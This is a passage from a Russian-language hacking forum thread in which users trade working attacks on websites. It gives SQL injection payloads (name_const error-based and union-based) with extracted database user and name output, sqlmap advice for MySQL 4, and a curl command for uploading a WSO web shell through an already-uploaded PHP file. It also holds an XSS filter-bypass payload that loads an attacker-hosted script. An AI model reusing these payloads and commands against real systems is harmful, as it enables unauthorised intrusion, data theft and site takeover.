ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
28.09.2014, 14:50
|
|
Новичок
Регистрация: 30.09.2012
Сообщений: 24
Провел на форуме:
5993
Репутация:
0
|
|
Сообщение от er9j6@
как вариант
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][/COLOR]
/about/news/1'and(select*from(select(name_const(version(),1)), name_const(version(),1))a)and'/ А если version() заменить на user() или database(), то какой результат получим?
Интересует рабочий запрос, а работоспособность вектора с name_const определяется как раз по user(), или любого произвольного значения а не в выводе версии.
Хотя, если ты осилил раскрутку через name_const то покажи как что то кроме версии вытащить.
|
|
|
28.09.2014, 16:18
|
|
Участник форума
Регистрация: 23.06.2013
Сообщений: 103
Провел на форуме:
23349
Репутация:
45
|
|
А почему бы не передать комментарий в raw форме, как это сделано с кавычкой ?
Код:
/about/news/1123123')union(select(1),2,3,4,5,6,user(),8,database(),10)#/
:User: u74960@10.8.1.153
Database: u74960 |
|
|
|
28.09.2014, 16:58
|
|
Новичок
Регистрация: 30.09.2012
Сообщений: 24
Провел на форуме:
5993
Репутация:
0
|
|
Сообщение от Inoms
А почему бы не передать комментарий в raw форме, как это сделано с кавычкой ?
Код:
/about/news/1123123')union(select(1),2,3,4,5,6,user(),8,database(),10)#/
:User: u74960@10.8.1.153
Database: u74960 Спасибо большое! Не додумался до посылки сырых запросов. Выручил.
|
|
|
|
03.10.2014, 14:45
|
|
Познающий
Регистрация: 20.09.2012
Сообщений: 53
Провел на форуме:
20084
Репутация:
0
|
|
как заставить sqlmap перебирать columns посимвольно? Предлогает только перебор по словарю
Mysql = 4.1
пробовал добавлять --technique=B , --technique=T
|
|
|
|
03.10.2014, 15:52
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от erwap
как заставить sqlmap перебирать columns посимвольно? Предлогает только перебор по словарю
Mysql = 4.1
пробовал добавлять --technique=B , --technique=T
в 4ой ветке нету Information_schema. Соответственно - ты не можешь производить операции считывания имени таблиц через функции mid(), substr(), substring(), left(), right() из системной таблицы, тк самой такой таблицы содержащей имена всех таблиц просто напросто нет.
Вывод - не заставишь. Для ветки 4.* такой технологии нет.
|
|
|
|
03.10.2014, 16:32
|
|
Познающий
Регистрация: 20.09.2012
Сообщений: 53
Провел на форуме:
20084
Репутация:
0
|
|
Сообщение от BigBear
в 4ой ветке нету Information_schema. Соответственно - ты не можешь производить операции считывания имени таблиц через функции mid(), substr(), substring(), left(), right() из системной таблицы, тк самой такой таблицы содержащей имена всех таблиц просто напросто нет.
Вывод - не заставишь. Для ветки 4.* такой технологии нет.
Да я в курсе насчет этого, есть же бинарный поиск посимвольно, но почему то скульмап мне предлогает столбцы подбирать перебором через словарь.
ЗЫ: time-based, boolean-based я руками не осилил, поэтому и приходится изощряться
|
|
|
|
03.10.2014, 17:00
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от erwap
Да я в курсе насчет этого, есть же бинарный поиск посимвольно, но почему то скульмап мне предлогает столбцы подбирать перебором через словарь.
ЗЫ: time-based, boolean-based я руками не осилил, поэтому и приходится изощряться
поэтому и предлагает перебирать по словарю. information_schema там нет. бинарный поиск посимвольно работает только если есть что искать
|
|
|
|
08.10.2014, 01:46
|
|
Новичок
Регистрация: 25.01.2012
Сообщений: 0
Провел на форуме:
0
Репутация:
5
|
|
На сайт загружен php файл с таким содержимым:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
Как с его помощью выполнить, или загрузить туда wso шелл? На примере готовой команды пожалуйста. |
|
|
|
08.10.2014, 08:24
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Грабитель, Для MySQL 4 в настоящее время нет вектора атак, позволяющего получить списки таблиц (в select запросе) подобно чтению information_schema в MySQL 5. Единственный метод - брут таблиц по словарю, исключая редкие нюансы, например такие как:
- Возможность доступа к ФС
- Наличие таблицы с отладочной информацией
- Возможность исполнения нескольких запросов за один раз (при использовании mysqli::multi_query, etc)
- etc
Сообщение от TIGERSSS
На сайт загружен php файл с таким содержимым:
Как с его помощью выполнить, или загрузить туда wso шелл? На примере готовой команды пожалуйста.
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]curl[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]F[/COLOR][COLOR="#DD0000"]"F1l3=@/home/user/shell/wso2.php"[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]F[/COLOR][COLOR="#DD0000"]"Name=/var/www/wso2.php"[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//site.com/file.php
[/COLOR][/COLOR]
|
|
|
|
08.10.2014, 09:30
|
|
Познающий
Регистрация: 29.01.2012
Сообщений: 44
Провел на форуме:
11466
Репутация:
3
|
|
Добрый день.
Имеется сайт с XSS: http://site.com/?name= XSS_TEXT
Html код этой страницы такой:
В свою очередь http://site.com/javascript-file.js?param= XSS_TEXT отдает вот что:
Код:
var sss = {
"param1" : 1,
"param2" : {
"param3" : 3,
"param4" : "XSS_TEXT"
}
};
Проблема в том что режется ' , ( , ) , scripts .
Поэтому все известные мне методы сразу отпали. Максимум чего мне удалось дописать это вот что:
http://site.com/javascript-file.js?param= "}};document.head.childNodes[1].src="http://mysite.com/global.js";var b={"1":{"1":"
Код:
var sss = {
"param1" : 1,
"param2" : {
"param3" : 3,
"param4" : ""}};
document.head.childNodes[1].src="http://mysite.com/global.js";
var b={"1":{"1":""
}
};
Fосле выполнения моего кода http://site.com/?name= "}};document.head.childNodes[1].src="http://mysite.com/global.js";var b={"1":{"1":" получается таким:
src меняется на мой, но прогрузки файла не происходит, соответственно и JS код не выполняется. Я не спец в JS, много не знаю. Поэтому прошу помочь обойти эту защиту, цель подключить и выполнить мой js файл(http://mysite.com/global.js)
Спасибо |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
